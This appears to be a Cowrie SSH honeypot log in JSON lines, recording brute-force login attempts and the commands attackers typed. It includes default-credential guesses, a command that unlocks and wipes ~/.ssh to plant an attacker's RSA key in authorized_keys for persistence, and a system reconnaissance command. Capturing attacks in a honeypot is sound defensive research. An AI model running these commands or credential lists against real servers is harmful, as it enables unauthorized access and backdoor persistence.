{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:54:41.466495Z","src_ip":"212.227.125.160","session":"bd146bae9005"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:54:41.845686Z","src_ip":"212.227.235.229","session":"270d473aaa07"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:54:41.846464Z","src_ip":"212.227.235.229","session":"270d473aaa07"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:54:41.847414Z","src_ip":"212.227.235.229","session":"270d473aaa07"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:54:42.086888Z","src_ip":"212.227.235.229","session":"270d473aaa07"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:54:43.038716Z","src_ip":"212.227.235.229","session":"270d473aaa07"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:54:43.039404Z","src_ip":"212.227.235.229","session":"270d473aaa07"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:54:43.283867Z","src_ip":"212.227.235.229","session":"270d473aaa07"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:54:43.284974Z","src_ip":"212.227.235.229","session":"270d473aaa07"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41692,"dst_ip":"1.2.3.4","dst_port":22,"session":"8dbcbf8759f5","protocol":"ssh","message":"New connection: 212.227.235.229:41692 (1.2.3.4:22) [session: 8dbcbf8759f5]","sensor":"my-vps","timestamp":"2025-08-31T00:54:43.515573Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:54:43.517894Z","src_ip":"212.227.235.229","session":"8dbcbf8759f5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:54:43.758503Z","src_ip":"212.227.235.229","session":"8dbcbf8759f5"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"abc123","message":"login attempt [daemon/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:54:44.264449Z","src_ip":"212.227.125.160","session":"bd146bae9005"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:54:44.704548Z","src_ip":"212.227.235.229","session":"8dbcbf8759f5"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:54:45.882802Z","src_ip":"212.227.125.160","session":"bd146bae9005"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:54:45.947563Z","src_ip":"212.227.235.229","session":"8dbcbf8759f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42770,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1803dccbd0b","protocol":"ssh","message":"New connection: 212.227.235.229:42770 (1.2.3.4:22) [session: e1803dccbd0b]","sensor":"my-vps","timestamp":"2025-08-31T00:54:46.183585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:54:46.185067Z","src_ip":"212.227.235.229","session":"e1803dccbd0b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:54:46.426219Z","src_ip":"212.227.235.229","session":"e1803dccbd0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60708,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f7647d88b2c","protocol":"ssh","message":"New connection: 212.227.125.160:60708 (1.2.3.4:22) [session: 2f7647d88b2c]","sensor":"my-vps","timestamp":"2025-08-31T00:54:46.567146Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:54:46.568068Z","src_ip":"212.227.125.160","session":"2f7647d88b2c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:54:46.641667Z","src_ip":"212.227.125.160","session":"2f7647d88b2c"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres","message":"login attempt [postgres/postgres] failed","sensor":"my-vps","timestamp":"2025-08-31T00:54:46.871472Z","src_ip":"212.227.125.160","session":"2f7647d88b2c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:54:47.422625Z","src_ip":"212.227.235.229","session":"e1803dccbd0b"}
{"eventid":"cowrie.session.closed","duration":13.952327013015747,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:54:47.587841Z","src_ip":"212.227.235.229","session":"098f8ed7e33a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:54:47.670245Z","src_ip":"212.227.235.229","session":"e1803dccbd0b"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:54:47.671107Z","src_ip":"212.227.235.229","session":"270d473aaa07"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:54:48.052137Z","src_ip":"212.227.125.160","session":"2f7647d88b2c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64874,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ffd40ae0de3","protocol":"ssh","message":"New connection: 217.72.205.35:64874 (1.2.3.4:22) [session: 0ffd40ae0de3]","sensor":"my-vps","timestamp":"2025-08-31T00:54:48.407743Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:54:48.408938Z","src_ip":"217.72.205.35","session":"0ffd40ae0de3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36840,"dst_ip":"1.2.3.4","dst_port":22,"session":"295bafda575f","protocol":"ssh","message":"New connection: 212.227.125.160:36840 (1.2.3.4:22) [session: 295bafda575f]","sensor":"my-vps","timestamp":"2025-08-31T00:54:56.984820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:54:56.985936Z","src_ip":"212.227.125.160","session":"295bafda575f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:54:57.060054Z","src_ip":"212.227.125.160","session":"295bafda575f"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"jenkins","message":"login attempt [jenkins/jenkins] failed","sensor":"my-vps","timestamp":"2025-08-31T00:54:57.284413Z","src_ip":"212.227.125.160","session":"295bafda575f"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:54:58.421927Z","src_ip":"212.227.125.160","session":"295bafda575f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41808,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d9bfd7d3dda","protocol":"ssh","message":"New connection: 212.227.125.160:41808 (1.2.3.4:22) [session: 8d9bfd7d3dda]","sensor":"my-vps","timestamp":"2025-08-31T00:55:07.338998Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:55:07.340235Z","src_ip":"212.227.125.160","session":"8d9bfd7d3dda"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:55:07.413109Z","src_ip":"212.227.125.160","session":"8d9bfd7d3dda"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:55:07.633859Z","src_ip":"212.227.125.160","session":"8d9bfd7d3dda"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:55:07.958297Z","src_ip":"212.227.125.160","session":"8d9bfd7d3dda"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:55:07.959019Z","src_ip":"212.227.125.160","session":"8d9bfd7d3dda"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:55:08.032876Z","src_ip":"212.227.125.160","session":"8d9bfd7d3dda"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:55:08.033892Z","src_ip":"212.227.125.160","session":"8d9bfd7d3dda"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47764,"dst_ip":"1.2.3.4","dst_port":22,"session":"daba0d03b51e","protocol":"ssh","message":"New connection: 212.227.125.160:47764 (1.2.3.4:22) [session: daba0d03b51e]","sensor":"my-vps","timestamp":"2025-08-31T00:55:17.801118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:55:17.801954Z","src_ip":"212.227.125.160","session":"daba0d03b51e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:55:17.876399Z","src_ip":"212.227.125.160","session":"daba0d03b51e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:55:18.120268Z","src_ip":"212.227.125.160","session":"daba0d03b51e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:55:19.244760Z","src_ip":"212.227.125.160","session":"daba0d03b51e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36278,"dst_ip":"1.2.3.4","dst_port":22,"session":"70285570554e","protocol":"ssh","message":"New connection: 212.227.235.229:36278 (1.2.3.4:22) [session: 70285570554e]","sensor":"my-vps","timestamp":"2025-08-31T00:55:23.145768Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:55:25.363611Z","src_ip":"212.227.235.229","session":"70285570554e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:55:25.364396Z","src_ip":"212.227.235.229","session":"70285570554e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41080,"dst_ip":"1.2.3.4","dst_port":22,"session":"6998abbec860","protocol":"ssh","message":"New connection: 212.227.125.160:41080 (1.2.3.4:22) [session: 6998abbec860]","sensor":"my-vps","timestamp":"2025-08-31T00:55:28.198850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:55:28.211892Z","src_ip":"212.227.125.160","session":"6998abbec860"}
